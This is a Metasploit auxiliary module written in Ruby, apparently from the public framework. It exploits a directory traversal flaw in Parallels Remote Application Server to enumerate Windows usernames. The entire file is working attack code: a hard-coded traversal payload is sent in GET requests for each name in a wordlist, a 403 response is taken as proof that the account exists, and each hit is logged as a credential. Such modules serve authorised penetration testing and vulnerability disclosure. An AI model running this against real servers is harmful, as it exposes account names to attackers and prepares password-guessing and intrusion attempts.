##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Parallels RAS Web Server Directory Traversal - Windows Username Enumeration",
      'Description'    => %q{
          This module performs Windows operating system username enumeration via a flaw in the Parallel's
          Remote Application Server (RAS). By leveraging a flawed directory traversal fix for CVE-2017-9447
          in conjunction with a logic flaw in application responses it is possible to determine if a requested
          file/folder is present on the remote server. When targeting a Windows system the most impactful use
          of this flaw is deemed to be performing username enumeration by querying users configured with a home
          directory typically in C:\Users e.g. C:\Users\Administrator. RAS Versions 15.5 Update 4 through to
          version 17.1.2 (released in July 2020) are affected.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 
        [
          'Matt Byrne <attackdebris[at]gmail.com>' # Vulnerability discovery & Metasploit module
        ],
      'References'     =>
        [
          [ 'URL', 'https://www.attackdebris.com/?p=602' ]
        ],
      'DisclosureDate'      => '2020-11-19', # Public disclosure
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('FILEPATH', [true, 'User\'s root directory e.g. users\\ for C:\\Users', 'users\\']),
	OptPath.new(
          'USER_FILE',
          [true, 'Files containing usernames, one per line', nil]
        )
      ],
     )
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: 'Parallels RAS',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      username: opts[:user],
      origin_type: :service,
      module_fullname: self.fullname,
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      #last_attempted_at: DateTime.now,
      status: Metasploit::Model::Login::Status::UNTRIED,
    }.merge(service_data)

    create_credential_login(login_data)
  end

def user_list
    users = nil
    if File.readable? datastore['USER_FILE']
      users = File.new(datastore['USER_FILE']).read.split
      users.each { |u| u.downcase! }
      users.uniq!
    else
      raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}"
    end
    users
  end

  def run_host(ip)
    # No point to continue if no filename is specified
    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
      print_error("Please supply the name of the file you want to download")
      return
    end

    # Create request
    traversal = "RASHTML5Gateway///..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\"
    user_list.each do |user|
      res = send_request_raw({
        'method' => 'GET',
        'uri'    => "/#{traversal}/#{datastore['FILEPATH']}/#{user}"
      }, 25)

      # Show data
      if res and res.code == 403 
        vprint_line(res.to_s)
        fname = File.basename(datastore['FILEPATH'])
        print_good("Username exists: #{user}")
      report_cred(
	ip: rhost,
        port: rport,
        service_name: 'Parallels RAS',
        user: user
	)
      else
	print_error("User directory is not present: #{user}")
      end
    end
  end
end
